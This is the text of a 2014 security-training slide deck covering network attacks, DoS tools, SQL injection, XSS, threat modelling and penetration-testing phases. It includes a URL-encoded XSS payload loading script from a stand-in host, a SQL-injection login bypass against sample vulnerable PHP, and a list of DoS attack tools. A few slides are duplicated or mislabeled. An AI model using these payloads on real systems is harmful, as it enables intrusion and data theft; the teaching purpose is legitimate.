SECURITY CONCEPTSDec 2014

• According to the Internet Storm Center (http://isc.sans.org), a computer connected to the Internet has an average of 5 minutes before it falls under some form of attack.

CURRENT STATISTICS

• http://securelist.com/statistics/

AGENDA:

1. Network Security

2. Threats and Vulnerability

3. Application, Data and Host Security

4. Security Threat Modelling

5. Penetration Testing

1. NETWORK SECURITY

NETWORK SECURITY PRINCIPLE

• Confidentiality: only sender, intended receiver should “understand” message contents

o sender encrypts message

o receiver decrypts message

• Authentication: sender, receiver want to confirm identity of each other

• Message Integrity: sender, receiver want to ensure message not altered (in transit, or afterwards) without detection

• Access and Availability: services must be accessible and available to users

NETWORK SECURITY THREATS

FRIENDS AND ENEMIES: ALICE, BOB, TRUDY

• well-known in network security world

• Bob, Alice (lovers!) want to communicate “securely”

• Trudy (intruder) may intercept, delete, add messages

securesender

securereceiver

channel data, control

messages

data data

Alice Bob

Trudy

data

8-

10

Who might Bob, Alice be?

• … well, real-life Bobs and Alices!

• Web browser/server for electronic transactions (e.g., on-line purchases)

• on-line banking client/server

• DNS servers

• routers exchanging routing table updates

• other examples?

8-

12

PRIVILEGE ESCALATION

APPLICATION LAYER ATTACK – LAYER 7

• HTTP: Virus, Worms, SQL Injection, XSS

• Malware: Trojans, Backdoors

SNIFFER ATTACK

• Wireshark

• CAIN and Abel

• TCPdump

• Kismet

• Dsniff

• etthercap

• Paros Proxy, Burp proxy

MAN IN THE MIDDLE ATTACK

DOS ATTACK

DOS ATTACK TOOLS• Jolt2

• Bubonic.c

• Land and LaTierra

• Targa

• Blast20

• Nemesy

• Panther2

• Crazy Pinger

• Some Trouble

• UDP Flood

• FSM

• FSMax

REFLECTION DOSThe attacking machines send out huge volumes of SYN packets

but with the IP source address pointing to the target machine.

SMURF ATTACK

MANGLE – INVALID PACKET ATTACK

Tools to simulate Invalid Packet attack

• Nmap

• Nessus

Tools to handle this

• Iptables(linux)

• Checkpoint

• Netfilter

• Application need to handle this

DDOS ATTACK

SYN FLOOD

TCP ATTACK• Send multiple TCP Reset packet

UDP ATTACK

BOTNET

• Exploit the system and make it botclient->Make botnet server aware it has joined botnet->Install Anti-

anti virus module->Listen to botnet server for instruction

BUFFER OVERFLOWA flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.

ROGUE DHCP SERVER

• Malicious software in the network

• A type of Man in middle attack

• Installed using rootkit

• Will spoof data, make network slow and create network problems

EAVESDROPPING

• Eavesdropping is secretly listening to the private conversation of others without their consent, as defined

by Black's Law Dictionary.

• Unencrypted open wifi network

• Tool: Firesheep

SOCIAL ENGINEERING ATTACK• Phishing is a technique of fraudulently obtaining private

information. Typically, the phisher sends an e-mail that appears to come from a legitimate business—a bank, or credit card company—requesting "verification" of information and warning of some dire consequences if it is not provided.

• Phone phishing uses a rogue IVR system to recreate a legitimate-sounding copy of a bank or other institution's IVR system.

• Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim.

• Shoulder surfing involves observing an employee's private information over their shoulder. This type of attack is common in public places such as airports, airplanes or coffee shops.

WORM

• Malicious software in the network

• A type of Man in middle attack

• Installed using rootkit

• Will spoof data, make network slow and create network problems

ROOTKIT

A rootkit is a stealthy type of software, typically malicious, designed

to hide the existence of certain processes or programs from normal

methods of detection and enable continued privileged access to a

computer.

MAC FLOODING - ARP

In a typical MAC flooding attack, a switch is fed many Ethernet frames, each containing different

source MAC addresses, by the attacker. The

intention is to consume the limited memory set

aside in the switch to store the MAC address table.

Tool: dsniff

DNS CACHE POISONING

DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain

Name System (DNS) resolver's cache, causing the name

server to return an incorrect IP address, diverting traffic to the

attacker's computer (or any other computer).

URL ENCODING OR CANONICALIZATIONCanonicalization is when a resource can be represented in more

than one manner.

Canonicalization of URLs occurs in a similar manner where

http://doman.tld/user/foo.gif and

http://domain.tld/user/bar/../foo.gif would represent the same image file

Results in XSS and SQL Injection attack.

Cross-Site Scripting

Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”];

URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f

www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e

HTML execution: <script src=”http://www.badplace.com/nasty.js”></script>

cheat sheet

PACKET TAPPING• Hardware to monitor packet

• vssmonitoring.com

MIME HEADER PARSING• Several Win32 mass mailers send themselves via an email with

a MIME encoded malicious executable with a malformed

header, and the executable will silently execute unbeknownst

to the user.

• This occurs whenever Internet Explorer parses the mail and thus can happen when simply reading or previewing email.

Thus, email worms can spread themselves without any user

actually executing or detaching a file.

http://www.kb.cert.org/vuls/id/980499

PACKET TAPPING• Hardware to monitor packet

• vssmonitoring.com

REPLAY ATTACK

• A replay attack (also known as playback attack) is a form of network

attack in which a valid data transmission is maliciously or fraudulently

repeated or delayed.

KEYLOGGER

• Keystroke logging, often referred to as keylogging or keyboard

capturing, is the action of recording (or logging) the keys struck on a

keyboard

• There are numerous keylogging methods, ranging from hardware

and software-based.

2. THREATS AND

VULNERABILITIES

TOP 10 VULNERABILITY SCANNER TOOLS

1. Nessus

2. openVAS

3. Core Impact

4. Nexpose

5. GFI Languard

6. Qualysguard

7. MBSA

8. Retina

9. Secunia

10. SAINT

VULNERABILITY RESEARCH WEBSITES

• http://www.kb.cert.org/vuls

• www.securitytracker.com

• www.microsoft.com/security

• www.securiteam.com

• www.packetstormsecurity.com

• www.hackerstorm.com

• www.hackerwatch.org

• www.securityfocus.com

• www.securitymagazine.com

VULNERABILITY SEARCH

• https://web.nvd.nist.gov/view/vuln/search

SOFTWARE EXPLOITATION

• Database

• Email

• Spyware – Join MS spynet using Windows

defender

• Rootkits -

http://www.liutilities.com/products/wintasks

pro/processlibrary.

SURVIVING MALICIOUS CODE

• Viruses

• Trojan Horses

• Logic Bombs

• Worms

• Antivirus Software

ATTACK

• Access attack – Dumpster diving,

Eavesdropping, Snooping, Interception

• Modification and Repudiation attack

• DOS attack – ping of death, buffer overflow

• Botnets - http://www.microsoft.com/security/sir

COMMON ATTACKS

• Backdoor

• Spoofing

• Phishing

• Man-In-Middle attack

• Replay attack

• Password guessing

• Privilege escalation

3. APPLICATION, DATA AND HOST

SECURITY

APPLICATION AND DATA SECURITY

• Web Application

• OWASP Top 10 -

https://www.owasp.org/index.php/OWASP_Top_Ten_Che

at_Sheet

• Hacking Tools: Instant Source, Wget,WebSleuth

BlackWidow,WindowBomb,Burp,cURL

SQL – TABLE NAME USERSName Age Email Password City

Ram 35 ram@abc.co

m

ram@123 Bangalore

Krishna 24 Krishna@nec.

com

098kkk Mysore

Parul 20 parul@gmail.

com

Pp234 chennai

Select age from users where name=‘Parul’;

Update users set email=‘ram@gmail.ocm’ where name=Ram;-- This is comment

INSERT into users values (‘Puja’, 30, ‘puja@gmail.com’,’ppp123’,’Ooty’);

DROP TABLE users;

e.g PHP code

$result = mysql_query(“select * from users where(name=‘$user’ and password=‘$pass’);”);

Add username as Bina’ OR 1=1);--

$result = mysql_query(“select * from users where(name=‘Bina’ OR 1=1);-- and password=‘junkvalue’);”);

SQL INJECTION STATISTICS

http://web.nvd.nist.gov/view/vuln/statistics

SQL INJECTION COUNTERMEASURES

• Input validation

– Check it is in valid format - whitelisting

– Input Sanitization

Blacklisting-avoid ‘ ; --

Escaping problematic chars

Use Prepared statements

$db=new mysql(“localhost”,”Sita”,”ssttpass”,”DB”);

$statement=$db->prepare(“select * from users

where(name=? And password=?);”);

$statement->bind_param(“ss”,$user, $pass);

$statement->execute();

CROSS SITE SCRIPTING

XSS

• Stored XSS

– Bad website->send malicious script to genuine web

server

– Client access genuine web server

– Run malicious script and sends data to attacker

• Reflected XSS attack

• Echoed input

• Prevention: Input validation

4. SECURITY THREAT MODELING

IMPORTANT KEYWORDS

• Threat Model

• Asset

• Threat

• Attack

• Attacker

• Impact

• Probability

• Mitigation

• Subject

IMPORTANT KEYWORDS CONTD…

• Object

• Action

• Intended Action

• Unintended Action

• Trust Boundary

• Subject/Object Matrix

• Actor/Action Matrix

• Data Flow Diagram

• Attack Tree

• IT Audit

THREAT MODELING

• Formal method to identify and enumerate risk

• Make informed risk decisions in regards to

– Actions

– Threats

– Mitigation against risk

WHAT CAN BE THREAT MODELED?

• Applications/ Software

• Systems

• Policies and Procedure

• Business Processes

• Anything….

WHEN TO DO THREAT MODELING

• Should be part of SDL

• Should be Iterative Process

• Whenever changes are made

RISK MANAGEMENT

• Risk Identification – incidents, bug reports,

testing

• Risk Enumeration & Classification – impact,

how and when it can occur, nature of risk

• Mitigation identification – cost benefit analysis

• Mitigation testing – Penetration testing, Third

party design review, procedural review and

management signoff, Legal review

THREAT MODEL PROCESS OVERVIEW

• Define Use Scenarios

• Define Security Assumptions

• Create/Update data flow diagram

• System Decomposition

• Identify Threats

• Determine Risks

• Plan Mitigations

• Iterate Threat Model

THREAT MODEL PROCESS METHODOLOGIES

• Microsoft STRIDE/DREAD

• NSA’s InfoSec Assessment Methodlogy

• CERT’s Octave

STRIDE

• Spoofing

• Tempering

• Repudiation

• Information Disclosure

• Denial of Service

• Escalation of Privilege

DREAD

• Damage Potential

• Reproducibility

• Exploitability

• Affected Users

• Discoverability

IAM

• Designed by NSA

• Used by US Federal Government

• Assessment broken into 10 different areas

• Designed to assess the risk of automated

information systems that support infra

• Highly detailed and rigid process

http://csrc.nist.gov/publications/PubsSPs.html#800-30

http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf

OCTAVE

• Originates from Carnegie Mellon University’s

S/W engg institute in collaboration with CERT

• Focusses on Org risk not technical

• OCTAVE for large org and OCTAVE-S for small

org.

http://www.cert.org/octave/

MS THREAT MODELING TOOL

• Based on CIA methodology

• Comprehensive attack library

• Contain helpful advanced features

http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518

http://msdn.microsoft.com/en-us/library/ff649779.aspx

5. PENETRATION TESTING

THREE PRE TEST PHASES

• Footprinting:

– Whois(internic.net), Smartwhois, nslookup

– Check company webpage, contact, location, numbers,

www.archive.org, whatismyip.com

– Employee blogs, Job boards

• Scanning

– Identifying active systems

– Discover open ports and access points

– Fingerprinting the OS

– Uncovering services on ports

Tools-> nmap, ping, traceroute, netcat

THREE PRE TEST PHASES CONTD….

• Enumerating

– Identify user accounts

– discover NetBIOS name with Nbtscan

– SNMPutil for SNMP

– Windows DNS query

– Establishing Null session

Tools->

Vulnerability Scanner: Retina, SAINT

Password Crackers: Brutus

IMPORTANT URLS

• Privilege Escalation: http://blog.spiderlabs.com/2012/12/my-5-top-ways-to-

escalate-privileges.html

• Sniffer Tools : http://sectools.org/tag/sniffers/

DEFENDING REPUTATION ON INTERNET

• http://www.defendmyname.com

• http://www.reputationdefender.com

• http://www.visibletechnologies.com

REFERENCES• Google

• Old training Materials

• Wikipedia

• Security books

BACKUP

a %61 backspace %08 : %3A

b %62 tab %09 ; %3B

c %63 linefeed %0A < %3C

d %64 creturn %0D = %3D

e %65 space %20 > %3E

f %66 ! %21 ? %3F

g %67 " %22 @ %40

h %68 # %23 A %41

i %69 $ %24 B %42

j %6A % %25 C %43

k %6B & %26 D %44

l %6C ' %27 E %45

m %6D ( %28 F %46

n %6E ) %29 G %47

o %6F * %2A H %48

p %70 + %2B I %49

q %71 , %2C J %4A

r %72 - %2D K %4B

s %73 . %2E L %4C

t %74 / %2F M %4D

u %75 0 %30 N %4E

v %76 1 %31 O %4F

w %77 2 %32 P %50

x %78 3 %33 Q %51

y %79 4 %34 R %52

z %7A 5 %35 S %53

{ %7B 6 %36 T %54

| %7C 7 %37 U %55

} %7D 8 %38 V %56

~ %7E 9 %39 W %57

X %58

Y %59

Z %5A

[ %5B

\ %5C

] %5D

^ %5E

_ %5F

` %60